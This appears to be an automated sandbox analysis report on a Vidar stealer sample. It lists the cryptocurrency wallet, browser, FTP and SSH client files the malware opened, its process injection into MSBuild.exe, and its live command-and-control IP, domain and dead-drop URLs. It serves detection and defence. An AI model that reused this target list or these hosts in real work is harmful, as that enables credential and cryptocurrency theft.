Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6512, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Vidar
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 0.2.file.exe.4579110.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.39e31c0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3a109f0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.4579110.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.39e31c0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.45a6940.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.45a6940.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3a109f0.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6512, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C750C40 sqlite3_bind_zeroblob,4_2_6C750C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C750D60 sqlite3_bind_parameter_name,4_2_6C750D60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C678EA0 sqlite3_clear_bindings,4_2_6C678EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C750B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,4_2_6C750B40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C676410 bind,WSAGetLastError,4_2_6C676410

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		Boot or Logon Initialization Scripts511
                        Process Injection                        		11
                        Deobfuscate/Decode Files or Information                        		1
                        Credentials in Registry                        		1
                        Account Discovery                        		Remote Desktop Protocol4
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                        Obfuscated Files or Information                        		Security Account Manager3
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Screen Capture                        		3
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Software Packing                        		NTDS44
                        System Information Discovery                        		Distributed Component Object ModelInput Capture114
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets51
                        Security Software Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials41
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                        Virtualization/Sandbox Evasion                        		DCSync12
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                        Process Injection                        		Proc Filesystem1
                        System Owner/User Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482751 Sample: file.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 35 steamcommunity.com 2->35 37 fp2e7a.wpc.phicdn.net 2->37 39 2 other IPs or domains 2->39 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 Antivirus detection for URL or domain 2->49 51 10 other signatures 2->51 8 file.exe 3 2->8         started        signatures3 process4 file5 25 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 8->25 dropped 53 Found many strings related to Crypto-Wallets (likely being stolen) 8->53 55 Writes to foreign memory regions 8->55 57 Allocates memory in foreign processes 8->57 59 Injects a PE file into a foreign processes 8->59 12 MSBuild.exe 35 8->12         started        17 MSBuild.exe 8->17         started        19 MSBuild.exe 8->19         started        21 MSBuild.exe 8->21         started        signatures6 process7 dnsIp8 41 steamcommunity.com 23.192.247.89, 443, 49730 AKAMAI-ASUS United States 12->41 43 5.75.212.60, 443, 49731, 49732 HETZNER-ASDE Germany 12->43 27 C:\ProgramData\vcruntime140.dll, PE32 12->27 dropped 29 C:\ProgramData\softokn3.dll, PE32 12->29 dropped 31 C:\ProgramData\nss3.dll, PE32 12->31 dropped 33 3 other files (none is malicious) 12->33 dropped 61 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->61 63 Found many strings related to Crypto-Wallets (likely being stolen) 12->63 65 Tries to harvest and steal ftp login credentials 12->65 71 3 other signatures 12->71 23 WerFault.exe 22 16 12->23         started        67 Contains functionality to inject code into remote processes 17->67 69 Searches for specific processes (likely to inject) 17->69 file9 signatures10 process11

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        file.exe32%ReversingLabsByteCode-MSIL.Trojan.Nekark
                        file.exe24%VirustotalBrowse
                        file.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        steamcommunity.com0%VirustotalBrowse
                        arpdabl.zapto.org12%VirustotalBrowse
                        fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
                        http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                        https://mozilla.org0/0%URL Reputationsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
                        http://arpdabl.zapto.org/y0%Avira URL Cloudsafe
                        https://5.75.212.60/sqls.dll100%Avira URL Cloudmalware
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                        https://5.75.212.60/sqls.dll12%VirustotalBrowse
                        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                        https://store.steampowered.com/subscriber_agreement/0%VirustotalBrowse
                        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                        http://arpdabl.zapto.org/q11%VirustotalBrowse
                        http://arpdabl.zapto.org/q0%Avira URL Cloudsafe
                        http://arpdabl.zapto.org/v0%Avira URL Cloudsafe
                        https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%Avira URL Cloudsafe
                        http://www.valvesoftware.com/legal.htm0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%Avira URL Cloudsafe
                        https://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%Avira URL Cloudsafe
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%VirustotalBrowse
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%Avira URL Cloudsafe
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english0%VirustotalBrowse
                        https://steamcommunity.com/profiles/76561199747278259/badges100%Avira URL Cloudmalware
                        https://5.75.212.60/-100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=english0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%VirustotalBrowse
                        http://arpdabl.zapto.org/i0%Avira URL Cloudsafe
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%VirustotalBrowse
                        https://steamcommunity.com/profiles/76561199747278259/badges0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%Avira URL Cloudsafe
                        https://5.75.212.60/-12%VirustotalBrowse
                        http://www.valvesoftware.com/legal.htm0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en0%Avira URL Cloudsafe
                        https://store.steampowered.com/privac0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&amp;l=e0%Avira URL Cloudsafe
                        https://5.75.212.60/A100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en0%VirustotalBrowse
                        https://store.steampowered.com/privac0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%VirustotalBrowse
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_0%VirustotalBrowse
                        https://t.me/armad2a100%Avira URL Cloudmalware
                        http://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                        https://store.steampowered.com/points/shop/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%VirustotalBrowse
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.00%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&amp;l=e0%VirustotalBrowse
                        https://t.me/armad2a2%VirustotalBrowse
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
                        https://steamcommunity.com/?/0%Avira URL Cloudsafe
                        http://store.steampowered.com/privacy_agreement/0%VirustotalBrowse
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                        https://5.75.212.60/softokn3.dllq100%Avira URL Cloudmalware
                        https://5.75.212.60/B100%Avira URL Cloudmalware
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.00%VirustotalBrowse
                        https://store.steampowered.com/points/shop/0%VirustotalBrowse
                        https://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                        http://arpdabl.HJECAAAEBF0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259100%Avira URL Cloudmalware
                        https://5.75.2120%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%Avira URL Cloudsafe
                        http://arpdabl.zapto.org0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%Avira URL Cloudsafe
                        https://5.75.212.60/o100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%Avira URL Cloudsafe
                        https://store.steampowered.com/about/0%Avira URL Cloudsafe
                        https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                        https://t.me/armad2ahellosqls.dllsqlite3.dllIn0%Avira URL Cloudsafe
                        https://5.75.212.60/nss3.dllQ100%Avira URL Cloudmalware
                        https://help.steampowered.com/en/0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        steamcommunity.com
                        		23.192.247.89
                        		truetrueunknown
                        arpdabl.zapto.org
                        		77.91.101.71
                        		truefalseunknown
                        fp2e7a.wpc.phicdn.net
                        		192.229.221.95
                        		truefalseunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://5.75.212.60/sqls.dllfalse
                        • 12%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://steamcommunity.com/profiles/76561199747278259true
                        • Avira URL Cloud: malware
                        		unknown
                        https://5.75.212.60/softokn3.dllfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://5.75.212.60/mozglue.dllfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://5.75.212.60/false
                        • Avira URL Cloud: malware
                        		unknown
                        https://5.75.212.60/freebl3.dllfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://5.75.212.60/nss3.dllfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://5.75.212.60/msvcp140.dllfalse
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabDAECFI.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://arpdabl.zapto.org/yMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=DAECFI.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://steamcommunity.com/?subsection=broadcastsMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://arpdabl.zapto.org/qMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmptrue
                        • 11%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://arpdabl.zapto.org/vMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.valvesoftware.com/legal.htmMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
